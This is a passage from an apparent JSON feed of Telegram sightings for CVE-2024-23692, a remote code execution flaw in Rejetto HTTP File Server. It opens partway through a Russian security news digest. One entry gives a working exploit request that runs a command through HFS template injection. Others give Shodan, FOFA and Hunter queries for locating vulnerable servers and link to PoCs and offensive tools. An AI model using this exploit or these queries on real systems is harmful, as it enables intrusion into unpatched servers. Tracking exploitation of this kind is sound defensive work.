\u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0434\u0432\u0438\u0436\u043a\u0430 \u043e\u0442\u043e\u0431\u0440\u0430\u0436\u0435\u043d\u0438\u044f, \u043f\u0440\u0435\u043e\u0431\u0440\u0430\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0438 \u043f\u0435\u0447\u0430\u0442\u0438 PDF, \u0433\u0434\u0435 \u043c\u043e\u0436\u0435\u0442 \u0441\u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c \u044d\u0442\u043e\u0442 \u0434\u0435\u0444\u0435\u043a\u0442 \u2014 \u043e\u0441\u0442\u0430\u0451\u0442\u0441\u044f \u0442\u043e\u043b\u044c\u043a\u043e \u0433\u0430\u0434\u0430\u0442\u044c. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430  \u0432 10.03.1, \u043d\u043e \u043d\u0430 \u043d\u0435\u0433\u043e \u0434\u043e\u043b\u0436\u043d\u044b \u043f\u0435\u0440\u0435\u0439\u0442\u0438 \u0432\u0441\u0435 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u0441\u043e\u0444\u0442\u0430, \u043a\u0443\u0434\u0430 \u0432\u043d\u0435\u0434\u0440\u0451\u043d Ghostscript \ud83e\udd37\u200d\u2642\ufe0f  \u041a\u0440\u0443\u043f\u043d\u044b\u0435 \u043f\u0440\u043e\u0435\u043a\u0442\u044b, \u0432 \u0442\u043e\u043c \u0447\u0438\u0441\u043b\u0435 \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0435 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u044b Linux, \u0441\u0432\u043e\u0435\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u043e \u0438\u043d\u0442\u0435\u0433\u0440\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u044d\u0442\u043e\u0442 \u043f\u0430\u0442\u0447.\n\n\ud83d\udd0e \u041e\u0434\u0438\u043d \u0438\u0437 \u043a\u0440\u0443\u043f\u043d\u0435\u0439\u0448\u0438\u0445 \u0435\u0432\u0440\u043e\u043f\u0435\u0439\u0441\u043a\u0438\u0445 \u0445\u043e\u0441\u0442\u0438\u043d\u0433-\u043f\u0440\u043e\u0432\u0430\u0439\u0434\u0435\u0440\u043e\u0432 OVHcloud \u043e\u0442\u0447\u0438\u0442\u0430\u043b\u0441\u044f \u043e\u0431 \u043e\u0447\u0435\u0440\u0435\u0434\u043d\u044b\u0445 \u0432\u043e\u043b\u043d\u0430\u0445  DDoS-\u0430\u0442\u0430\u043a. \u0422\u0440\u0435\u0432\u043e\u0433\u0443 \u0432\u044b\u0437\u044b\u0432\u0430\u044e\u0442 \u043d\u0435 \u0441\u0442\u043e\u043b\u044c\u043a\u043e \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u044b\u0435 \u0440\u0435\u043a\u043e\u0440\u0434\u044b (840 Mpps), \u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0440\u0435\u0437\u043a\u043e\u0435 \u0443\u0447\u0430\u0449\u0435\u043d\u0438\u0435 \u043e\u0447\u0435\u043d\u044c \u043c\u043e\u0449\u043d\u044b\u0445 \u0430\u0442\u0430\u043a (\u0431\u043e\u043b\u0435\u0435 100 Mpps) \u2014 \u043e\u043d\u0438 \u0438\u0434\u0443\u0442 \u0441\u043e\u0442\u043d\u044f\u043c\u0438 \u043a\u0430\u0436\u0434\u0443\u044e \u043d\u0435\u0434\u0435\u043b\u044e. \u0412\u043e \u0432\u0441\u0451\u043c \u0432\u0438\u043d\u044f\u0442 \u0437\u0430\u0440\u0430\u0436\u0451\u043d\u043d\u044b\u0435 \u0440\u043e\u0443\u0442\u0435\u0440\u044b MicroTik Core Cloud Router, \u0447\u0430\u0441\u0442\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0435 \u043d\u0435\u0431\u043e\u043b\u044c\u0448\u0438\u043c\u0438 \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442-\u043f\u0440\u043e\u0432\u0430\u0439\u0434\u0435\u0440\u0430\u043c\u0438 \u0434\u043b\u044f \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0445 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432.\n\n\ud83d\udcbe  \u0421\u0442\u0430\u0440\u044b\u0439, \u043d\u043e \u0432\u0441\u0451 \u0435\u0449\u0451 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0439 \u0441\u0440\u0435\u0434\u0438 \u043d\u0435\u0431\u043e\u043b\u044c\u0448\u0438\u0445 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0439 \u0438 \u0447\u0430\u0441\u0442\u043d\u044b\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0432\u0435\u0431-\u0441\u0435\u0440\u0432\u0435\u0440 Rejetto HFS \u0430\u0442\u0430\u043a\u0443\u044e\u0442 \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 \u0440\u0430\u0437\u0433\u043b\u0430\u0448\u0451\u043d\u043d\u043e\u0439 \u0432 \u043c\u0430\u0435 CVE-2024-23692, \u043f\u0440\u0438\u0432\u043e\u0434\u044f\u0449\u0435\u0439 \u043a RCE \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438. \u041d\u0430 \u043f\u043e\u0440\u0430\u0436\u0451\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445 \u0441\u0442\u0430\u0432\u044f\u0442 \u043a\u0440\u0438\u043f\u0442\u043e\u043c\u0430\u0439\u043d\u0435\u0440\u044b \u0438 \u0431\u044d\u043a\u0434\u043e\u0440\u044b PlugX, GhostRAT, XenoRAT. \u0423\u044f\u0437\u0432\u0438\u043c\u044b \u043d\u0435\u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u043c\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 \u043b\u0438\u043d\u0435\u0439\u043a\u0438 2.3, \u0431\u043e\u043b\u0435\u0435 \u043d\u043e\u0432\u0430\u044f \u0432\u0435\u0440\u0441\u0438\u044f 3 \u043d\u0435 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 \u044d\u0442\u043e\u0433\u043e \u0434\u0435\u0444\u0435\u043a\u0442\u0430.\n\n\ud83e\udd21 \u041e\u043d\u0438 \u0440\u0435\u0430\u043b\u044c\u043d\u043e \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0442: \u0432 \u0410\u0432\u0441\u0442\u0440\u0430\u043b\u0438\u0438 \u0437\u0430\u0434\u0435\u0440\u0436\u0430\u043b\u0438 \u0447\u0435\u043b\u043e\u0432\u0435\u043a\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0444\u0430\u043b\u044c\u0448\u0438\u0432\u043e\u0439 \u0442\u043e\u0447\u043a\u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u0430 Wi-Fi \u0432\u044b\u043c\u0430\u043d\u0438\u0432\u0430\u043b \u0434\u0430\u043d\u043d\u044b\u0435 \u043f\u0430\u0441\u0441\u0430\u0436\u0438\u0440\u043e\u0432 \u043f\u0440\u044f\u043c\u043e \u0432\u043e \u0432\u0440\u0435\u043c\u044f \u0430\u0432\u0438\u0430\u043f\u0435\u0440\u0435\u043b\u0451\u0442\u0430.\n\n#\u043d\u043e\u0432\u043e\u0441\u0442\u0438 #\u0434\u0430\u0439\u0434\u0436\u0435\u0441\u0442 @\u041f2\u0422", "creation_timestamp": "2024-07-08T08:35:52.000000Z"}, {"uuid": "d30fbd53-8737-470c-90bf-0d1bdbb953e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "published-proof-of-concept", "source": "Telegram/JoQtj5AdiD3-tPl5hOP3C8URDdSb5M2KUaMetfPTceIlNg", "content": "", "creation_timestamp": "2024-08-05T17:45:44.000000Z"}, {"uuid": "9f4401c2-d133-45af-8d60-f3573eda6368", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/1720", "content": "cve-2024-23692\n\nGET /?n=%0A&cmd=netstat&search=%25xxx%25url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} HTTP/1.1\n\nnetstat\n\n#exploit #poc", "creation_timestamp": "2024-08-05T18:12:38.000000Z"}, {"uuid": "02c74879-6a89-4238-83ed-e29ddfd79aa9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "published-proof-of-concept", "source": "Telegram/ycwKTHgZGw16wRL469-ciKgSbuNK_wZ7HFGE87nEok6MCA", "content": "", "creation_timestamp": "2024-06-11T18:46:36.000000Z"}, {"uuid": "ad35f29f-1590-49fe-bb25-3e33798b0da8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "seen", "source": "Telegram/_2v0lNXjUOPTXv7oR-Ebt-7sM1mwQMCyV0tz54fy4yRqnQ", "content": "", "creation_timestamp": "2024-12-10T06:28:50.000000Z"}, {"uuid": "b1075cb3-f0b3-4601-a2c5-cac9434c77fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/814", "content": "\ud83d\udea8POC RELEASED\ud83d\udea8CVE-2024-23692 Unauthenticated RCE Flaw in Rejetto HTTP File Server\n\n#DarkWeb #Cybersecurity #Security #Cyberattack #Cybercrime #Privacy #Infosec #CVE202423692 #Vulnerability\n\nhttps://x.com/DarkWebInformer/status/1800568089811251282\n\nhttps://github.com/k3lpi3b4nsh33/CVE-2024-23692", "creation_timestamp": "2024-06-11T18:46:37.000000Z"}, {"uuid": "9dcc0e99-3954-47a1-92b3-4e13ad845df6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "published-proof-of-concept", "source": "https://t.me/HackerArsenal/399", "content": "CVE-2024-23692 RCE\n*\nRejetto HTTP File Server\n*\nexploit", "creation_timestamp": "2024-09-19T13:23:03.000000Z"}, {"uuid": "7f7123e6-12be-4381-baaa-f788ea5bbc1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "published-proof-of-concept", "source": "https://t.me/HackingInsights/6369", "content": "CVE-2024\u201323692: A Critical Vulnerability in Rejetto HTTP File Server: https://infosecwriteups.com/cve-2024-23692-a-critical-vulnerability-in-rejetto-http-file-server-1df322a2e688?source=rss------bug_bounty-5", "creation_timestamp": "2024-07-18T04:18:35.000000Z"}, {"uuid": "ba619e59-816f-405c-9877-fe36e8e62f5f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "published-proof-of-concept", "source": "https://t.me/ZeroEthical_Course/1483", "content": "CVE-2024-23692 RCE\n*\nRejetto HTTP File Server\n*\nexploit", "creation_timestamp": "2024-09-18T03:05:10.000000Z"}, {"uuid": "f3878465-ce20-4ee3-9a07-20d82f92e4e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "published-proof-of-concept", "source": "https://t.me/HackingInsights/2058", "content": "\u200aCVE-2024-23692: Unauthenticated RCE Flaw in Rejetto HTTP File Server, PoC Published\n\nhttps://securityonline.info/cve-2024-23692-unauthenticated-rce-flaw-in-rejetto-http-file-server-poc-published/", "creation_timestamp": "2024-06-10T12:19:13.000000Z"}, {"uuid": "9d28b990-22e0-4001-87c5-8ecd73d318d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "published-proof-of-concept", "source": "https://t.me/darkcommunityofficial/975", "content": "https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/\n\nRejetto HTTP File Server 2.3m Unauthenticated RCE \ncve-2024-23692\n#\u5206\u6790 #poc", "creation_timestamp": "2024-06-12T10:41:08.000000Z"}, {"uuid": "67c751a8-650f-430c-8092-60c9b679de6e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "seen", "source": "https://t.me/paiddpam/6937", "content": "\u2604\ufe0fCVE-2024-23692:Unauthenticated RCE Flaw in Rejetto HTTP File Server\n\n\n\ud83d\udc80Dork: \nHUNTER:\nweb.body=\"HttpFileServer\"&&header.server==\"HFS 2.3m\"", "creation_timestamp": "2024-12-10T06:28:50.000000Z"}, {"uuid": "603adce9-126e-4b5f-ad8b-b37b952b4092", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/1074", "content": "Tools - Hackers Factory \n\nIndetectables-net/toolkit: The essential toolkit for reversing, malware analysis, and cracking.\n\nhttps://github.com/indetectables-net/toolkit\n\nGitHub - Chocapikk/CVE-2024-45519: Zimbra - Remote Command Execution (CVE-2024-45519)\n\nhttps://github.com/Chocapikk/CVE-2024-45519\n\nOWASP Amass Project\n\nhttps://github.com/owasp-amass\n\nPoC for the Untrusted Pointer Dereference in the ks.sys driver\n\nhttps://github.com/varwara/CVE-2024-35250\n\nPOC - Unauthenticated RCE Flaw in Rejetto HTTP File Server - CVE-2024-23692\n\nhttps://github.com/verylazytech/CVE-2024-23692\n\nPowerShell Obfuscator\n\nhttps://github.com/TaurusOmar/psobf\n\nModTracer Finds Hidden Linux Kernel Rootkits and then make visible again.\n\nhttps://github.com/MatheuZSecurity/ModTracer\n\n1C RAS Offensive Security Tool\n\nhttps://github.com/sdnv0x4d/rasoff\n\nRust Weaponization for Red Team Engagements.\n\nhttps://github.com/trickster0/OffensiveRust\n\n#CyberDilara\nhttps://t.me/dilagrafie", "creation_timestamp": "2024-10-21T13:25:19.000000Z"}, {"uuid": "674e776d-44c3-456c-b891-1b143343948a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "published-proof-of-concept", "source": "https://t.me/arvinclub1/1147", "content": "https://medium.com/@verylazytech/poc-unauthenticated-rce-flaw-in-rejetto-http-file-server-cve-2024-23692-d014c26ab5e4", "creation_timestamp": "2024-09-29T14:31:42.000000Z"}, {"uuid": "b1cf2093-1ebc-4f7d-8b92-20091314045e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "published-proof-of-concept", "source": "https://t.me/paiddpam/2899", "content": "CVE-2024-23692: Unauthenticated RCE Flaw in Rejetto HTTP File Server\n\nIt allows remote attackers to execute arbitrary code on affected servers without authentication, potentially leading to data breaches, ransomware attacks, and complete system compromise.\n\nBlog: https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/\n\nQuery:\nHunter: /product.name=\"HTTP File Server\" and web.body=\"Rejetto\"\nFOFA: product=\"HFS\"\nSHODAN: product:\"HttpFileServer httpd\"", "creation_timestamp": "2024-06-11T12:26:44.000000Z"}, {"uuid": "51b52df9-0472-42ab-889c-6da6a4983964", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/907", "content": "Tools - Hackers Factory \n\nNetwork scanner & notification framework\n\nScans for devices connected to your network and alerts you if new and unknown devices are found.\n \nhttps://github.com/jokob-sk/NetAlertX\n\nThis repo contains my pentesting template that I have used in PWK and for current assessments. The template has been formatted to be used in Obsidian\n\nhttps://github.com/tjnull/TJ-OPT\n\nAgartha \ud83c\udff4\u200d\u2620\ufe0f  A burp extension for dynamic payload \ngeneration to detect injection flaws (RCE, LFI, SQLi)\n \nhttps://github.com/0xSojalSec/agartha\n\nCVE-2024-8190: Ivanti Cloud Service Appliance Authenticated Command Injection\n\nhttps://github.com/horizon3ai/CVE-2024-8190\n\nInception is a physical memory manipulation and hacking tool exploiting PCI-based DMA. The tool can attack over FireWire, Thunderbolt, ExpressCard, PC Card and any other PCI/PCIe interfaces\n\nhttps://github.com/carmaa/inception\n\nNyxInvoke is a Rust CLI tool for running .NET assemblies, PowerShell, and BOFs with Patchless AMSI and ETW bypass features. with Dual-build support\n\nhttps://github.com/BlackSnufkin/NyxInvoke\n\nDarkGPT is an OSINT assistant based on GPT-4-200K (recommended use) designed to perform queries on leaked databases, thus providing an artificial intelligence assistant that can be useful in your traditional OSINT processes.\n\nhttps://github.com/luijait/DarkGPT\n\nOSINT tool to crawl a site and extract useful recon info.\n\nhttps://github.com/chm0dx/creepyCrawler\n\nWrite and deploy websites using the C Programming Language.\n\nhttps://github.com/KDesp73/webc\n\nPOC - Unauthenticated RCE Flaw in Rejetto HTTP File Server - CVE-2024-23692\n\nhttps://github.com/verylazytech/CVE-2024-23692\n\n#CyberDilara \nhttps://t.me/CyberDilara", "creation_timestamp": "2024-09-19T12:16:08.000000Z"}, {"uuid": "90d9c1a9-c777-44ce-b65f-5ede49b4f685", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "published-proof-of-concept", "source": "Telegram/VMLJJiZH4jXjie4YIfOh584H5wOYQyhuQQBx7LMIFjIClLI", "content": "", "creation_timestamp": "2024-08-06T23:48:46.000000Z"}, {"uuid": "6e3e61c3-deac-4eb3-9878-5e1748d1b883", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/8888", "content": "Tools - Hackers Factory \n\nIndetectables-net/toolkit: The essential toolkit for reversing, malware analysis, and cracking.\n\nhttps://github.com/indetectables-net/toolkit\n\nGitHub - Chocapikk/CVE-2024-45519: Zimbra - Remote Command Execution (CVE-2024-45519)\n\nhttps://github.com/Chocapikk/CVE-2024-45519\n\nOWASP Amass Project\n\nhttps://github.com/owasp-amass\n\nPoC for the Untrusted Pointer Dereference in the ks.sys driver\n\nhttps://github.com/varwara/CVE-2024-35250\n\nPOC - Unauthenticated RCE Flaw in Rejetto HTTP File Server - CVE-2024-23692\n\nhttps://github.com/verylazytech/CVE-2024-23692\n\nPowerShell Obfuscator\n\nhttps://github.com/TaurusOmar/psobf\n\nModTracer Finds Hidden Linux Kernel Rootkits and then make visible again.\n\nhttps://github.com/MatheuZSecurity/ModTracer\n\n1C RAS Offensive Security Tool\n\nhttps://github.com/sdnv0x4d/rasoff\n\nRust Weaponization for Red Team Engagements.\n\nhttps://github.com/trickster0/OffensiveRust\n\n#CyberDilara\nhttps://t.me/dilagrafie", "creation_timestamp": "2024-10-21T13:23:53.000000Z"}, {"uuid": "50fa18af-71d4-4c7c-824b-6115d93f67e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "published-proof-of-concept", "source": "Telegram/Ugl_MvDTnSuasV293MEcdRpmK2elBpnfRk-Qt_RcIla-DtA", "content": "", "creation_timestamp": "2025-03-06T16:00:09.000000Z"}, {"uuid": "66d5fa73-fad9-4d5a-ac48-3835006f7468", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/8765", "content": "Tools - Hackers Factory \n\nNetwork scanner & notification framework\n\nScans for devices connected to your network and alerts you if new and unknown devices are found.\n \nhttps://github.com/jokob-sk/NetAlertX\n\nThis repo contains my pentesting template that I have used in PWK and for current assessments. The template has been formatted to be used in Obsidian\n\nhttps://github.com/tjnull/TJ-OPT\n\nAgartha \ud83c\udff4\u200d\u2620\ufe0f  A burp extension for dynamic payload \ngeneration to detect injection flaws (RCE, LFI, SQLi)\n \nhttps://github.com/0xSojalSec/agartha\n\nCVE-2024-8190: Ivanti Cloud Service Appliance Authenticated Command Injection\n\nhttps://github.com/horizon3ai/CVE-2024-8190\n\nInception is a physical memory manipulation and hacking tool exploiting PCI-based DMA. The tool can attack over FireWire, Thunderbolt, ExpressCard, PC Card and any other PCI/PCIe interfaces\n\nhttps://github.com/carmaa/inception\n\nNyxInvoke is a Rust CLI tool for running .NET assemblies, PowerShell, and BOFs with Patchless AMSI and ETW bypass features. with Dual-build support\n\nhttps://github.com/BlackSnufkin/NyxInvoke\n\nDarkGPT is an OSINT assistant based on GPT-4-200K (recommended use) designed to perform queries on leaked databases, thus providing an artificial intelligence assistant that can be useful in your traditional OSINT processes.\n\nhttps://github.com/luijait/DarkGPT\n\nOSINT tool to crawl a site and extract useful recon info.\n\nhttps://github.com/chm0dx/creepyCrawler\n\nWrite and deploy websites using the C Programming Language.\n\nhttps://github.com/KDesp73/webc\n\nPOC - Unauthenticated RCE Flaw in Rejetto HTTP File Server - CVE-2024-23692\n\nhttps://github.com/verylazytech/CVE-2024-23692\n\n#CyberDilara \nhttps://t.me/CyberDilara", "creation_timestamp": "2024-09-19T05:20:08.000000Z"}, {"uuid": "c08bb7f9-7a17-4da1-aef7-c9dda0b91826", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3798", "content": "Tools - Hackers Factory \n\nIndetectables-net/toolkit: The essential toolkit for reversing, malware analysis, and cracking.\n\nhttps://github.com/indetectables-net/toolkit\n\nGitHub - Chocapikk/CVE-2024-45519: Zimbra - Remote Command Execution (CVE-2024-45519)\n\nhttps://github.com/Chocapikk/CVE-2024-45519\n\nOWASP Amass Project\n\nhttps://github.com/owasp-amass\n\nPoC for the Untrusted Pointer Dereference in the ks.sys driver\n\nhttps://github.com/varwara/CVE-2024-35250\n\nPOC - Unauthenticated RCE Flaw in Rejetto HTTP File Server - CVE-2024-23692\n\nhttps://github.com/verylazytech/CVE-2024-23692\n\nPowerShell Obfuscator\n\nhttps://github.com/TaurusOmar/psobf\n\nModTracer Finds Hidden Linux Kernel Rootkits and then make visible again.\n\nhttps://github.com/MatheuZSecurity/ModTracer\n\n1C RAS Offensive Security Tool\n\nhttps://github.com/sdnv0x4d/rasoff\n\nRust Weaponization for Red Team Engagements.\n\nhttps://github.com/trickster0/OffensiveRust\n\n#CyberDilara\nhttps://t.me/dilagrafie", "creation_timestamp": "2024-10-21T13:23:24.000000Z"}, {"uuid": "c4da9a7e-ae16-4959-8e37-f50e2265d057", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "published-proof-of-concept", "source": "https://t.me/InfoSecInsider/23811", "content": "Tools - Hackers Factory \n\nNetwork scanner & notification framework\n\nScans for devices connected to your network and alerts you if new and unknown devices are found.\n \nhttps://github.com/jokob-sk/NetAlertX\n\nThis repo contains my pentesting template that I have used in PWK and for current assessments. The template has been formatted to be used in Obsidian\n\nhttps://github.com/tjnull/TJ-OPT\n\nAgartha \ud83c\udff4\u200d\u2620\ufe0f  A burp extension for dynamic payload \ngeneration to detect injection flaws (RCE, LFI, SQLi)\n \nhttps://github.com/0xSojalSec/agartha\n\nCVE-2024-8190: Ivanti Cloud Service Appliance Authenticated Command Injection\n\nhttps://github.com/horizon3ai/CVE-2024-8190\n\nInception is a physical memory manipulation and hacking tool exploiting PCI-based DMA. The tool can attack over FireWire, Thunderbolt, ExpressCard, PC Card and any other PCI/PCIe interfaces\n\nhttps://github.com/carmaa/inception\n\nNyxInvoke is a Rust CLI tool for running .NET assemblies, PowerShell, and BOFs with Patchless AMSI and ETW bypass features. with Dual-build support\n\nhttps://github.com/BlackSnufkin/NyxInvoke\n\nDarkGPT is an OSINT assistant based on GPT-4-200K (recommended use) designed to perform queries on leaked databases, thus providing an artificial intelligence assistant that can be useful in your traditional OSINT processes.\n\nhttps://github.com/luijait/DarkGPT\n\nOSINT tool to crawl a site and extract useful recon info.\n\nhttps://github.com/chm0dx/creepyCrawler\n\nWrite and deploy websites using the C Programming Language.\n\nhttps://github.com/KDesp73/webc\n\nPOC - Unauthenticated RCE Flaw in Rejetto HTTP File Server - CVE-2024-23692\n\nhttps://github.com/verylazytech/CVE-2024-23692\n\n#CyberDilara \nhttps://t.me/CyberDilara", "creation_timestamp": "2024-09-21T12:35:29.000000Z"}, {"uuid": "7652f08b-4156-4779-9cbf-173893025493", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "published-proof-of-concept", "source": "Telegram/UIXX7mOJKCUCetdmvcJ7F-zWZBwUgF-H_JLlTPRtlfWeBofr", "content": "", "creation_timestamp": "2024-10-22T08:25:10.000000Z"}, {"uuid": "4eb4d749-5beb-49da-905b-746363855d0c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3732", "content": "Tools - Hackers Factory \n\nNetwork scanner & notification framework\n\nScans for devices connected to your network and alerts you if new and unknown devices are found.\n \nhttps://github.com/jokob-sk/NetAlertX\n\nThis repo contains my pentesting template that I have used in PWK and for current assessments. The template has been formatted to be used in Obsidian\n\nhttps://github.com/tjnull/TJ-OPT\n\nAgartha \ud83c\udff4\u200d\u2620\ufe0f  A burp extension for dynamic payload \ngeneration to detect injection flaws (RCE, LFI, SQLi)\n \nhttps://github.com/0xSojalSec/agartha\n\nCVE-2024-8190: Ivanti Cloud Service Appliance Authenticated Command Injection\n\nhttps://github.com/horizon3ai/CVE-2024-8190\n\nInception is a physical memory manipulation and hacking tool exploiting PCI-based DMA. The tool can attack over FireWire, Thunderbolt, ExpressCard, PC Card and any other PCI/PCIe interfaces\n\nhttps://github.com/carmaa/inception\n\nNyxInvoke is a Rust CLI tool for running .NET assemblies, PowerShell, and BOFs with Patchless AMSI and ETW bypass features. with Dual-build support\n\nhttps://github.com/BlackSnufkin/NyxInvoke\n\nDarkGPT is an OSINT assistant based on GPT-4-200K (recommended use) designed to perform queries on leaked databases, thus providing an artificial intelligence assistant that can be useful in your traditional OSINT processes.\n\nhttps://github.com/luijait/DarkGPT\n\nOSINT tool to crawl a site and extract useful recon info.\n\nhttps://github.com/chm0dx/creepyCrawler\n\nWrite and deploy websites using the C Programming Language.\n\nhttps://github.com/KDesp73/webc\n\nPOC - Unauthenticated RCE Flaw in Rejetto HTTP File Server - CVE-2024-23692\n\nhttps://github.com/verylazytech/CVE-2024-23692\n\n#CyberDilara \nhttps://t.me/CyberDilara", "creation_timestamp": "2024-09-19T11:36:01.000000Z"}, {"uuid": "0502c282-3d18-4ba6-9902-44c6ef55b6d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "published-proof-of-concept", "source": "Telegram/ik2fnBLlR5vdC2kR4eB9BnV8YmyTrJrSbbh_Ue92ni3sHXo", "content": "", "creation_timestamp": "2024-07-05T19:53:36.000000Z"}, {"uuid": "c693248a-d49f-42fa-b5c3-cdcb3c5b876a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23692", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/2268", "content": "CVE-2024-23692 RCE\n*\nRejetto HTTP File Server\n*\nexploit", "creation_timestamp": "2024-09-17T21:13:37.000000Z"}, {"uuid": 